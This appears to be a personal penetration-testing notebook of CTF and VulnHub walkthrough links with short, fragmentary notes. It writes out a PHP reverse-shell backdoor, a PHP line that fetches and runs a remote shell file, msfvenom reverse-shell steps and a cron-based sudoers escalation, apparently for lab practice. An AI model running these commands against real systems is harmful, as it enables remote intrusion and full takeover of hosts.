nagpentest

Walkthru: A.https://v3ded.github.io/ctf/htb-nineveh.html [hydra brute force www, searchsploit php Lite Admin 1.9, hydra brute force https where username is irrevalant but just required to complete the command, php reverse shell, Create a database in phpLiteAdmin and table , directory traversal  ,  chkrootkit   privilege escalation bug,  port knocking ,  strings to extract key from png file  ] Notes: Unable to test it since the VM had static IP. Read Waltthru Make our own .txt backdoor file inside /var/www/html with <?php $sock=fsockopen("YOUR IP",1234);exec("/bin/sh -i <&3 >&3 2>&3");?> as the content Change Database  and add a table inside called shell, select 1 field: Name the field whatever we wish, set it as text type, put  <?php system("wget YOURIP/shell.txt -O /tmp/shell.php; php /tmp/shell.php"); ?>  into the default value & click create. This should create a new table with our exploit...

Walkthru: A. http://www.hackingarticles.in/hack-the-bob-1-0-1-vm-ctf-challenge/[webshell, robotos.txt, reverse shell, combining two o/s commands using && and ||, hidden content/information, spawing a python shell, ssh on non default port, search for txt file, password in text file, gpg file where keys is first alphabets of the line of a file,] B. https://dangwasec.wordpress.com/2018/03/20/ctf-bob-1-0-1-walkthrough/ [burp] C. https://hackso.me/bob-1.0.1-walkthrough/ [PGPCrack-NG is a program designed to brute-force symmetrically encrypted PGP files not useful here] Notes: file notes.sh #!/bin/bash clear echo "-= Notes =-" echo "Harry Potter is my faviorite" echo "Are you the real me?" echo "Right, I'm ordering pizza this is going nowhere" echo "People just don't get me" echo "Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>" echo "Cucumber" echo "Rest now your eyes are slee...

error while importing storage

Walkthru. A.https://mrh4sh.github.io/defence-space-solution [PhpmyAdmin,ftp,http/s,default pwd,flag in certificate,ssh on 2225 port, crunch cmd] B. https://mrh4sh.github.io/defence-space-solution [reverse shell using python and SQL ] Notes:

Notes: https://d7x.promiselabs.net/2018/07/26/ctf-jarbas-1-vulnhub-ctf-walkthrough/ [website linked to external website, jenkins, durb using -x option to search for html and php files, unhash pwd, run shell via jenkins web app, msfvenom code base64 encode/decode, privlege escalation adding user in sudo file by adding in sudoer file] Walkthru: Reverse shell steps... 1.  msfvenom -a x64 -p linux/x64/shell_reverse_tcp lhost=192.168.117.4 lport=443 -e x86/shikata_ga_nai -f elf -b '\x00' > shell.bin 2. cat shell.bin | base64 3. echo "replace_it_with_the_content_of_the_shell.bin" | base64 -d > /tmp/shell.bin     chmod +x /tmp/shell.bin     tmp/shell.bin   echo "echo 'jenkins ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers" >> /etc/script/CleaningScript.sh→ where CleaningScript.sh is the file that runs via the the crontab

Walkthru: A. https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/ [dirb, info in source html, password in mysql.conf.d ] Notes:

Walkthru: A. http://touhidshaikh.com/blog/?p=475 [zip2john, burp proxy change user agent vulnerability, php reverse shell] Notes: This VM also has another vulnerability https://www.exploit-db.com/exploits/42003/ which I was able to use to run uname-a and id command in the filename but couldnt do anything beyound that. Unable to run reverse shell. A. Imported the file successfully but do not see any output when command is run via user agent field. No output is shown.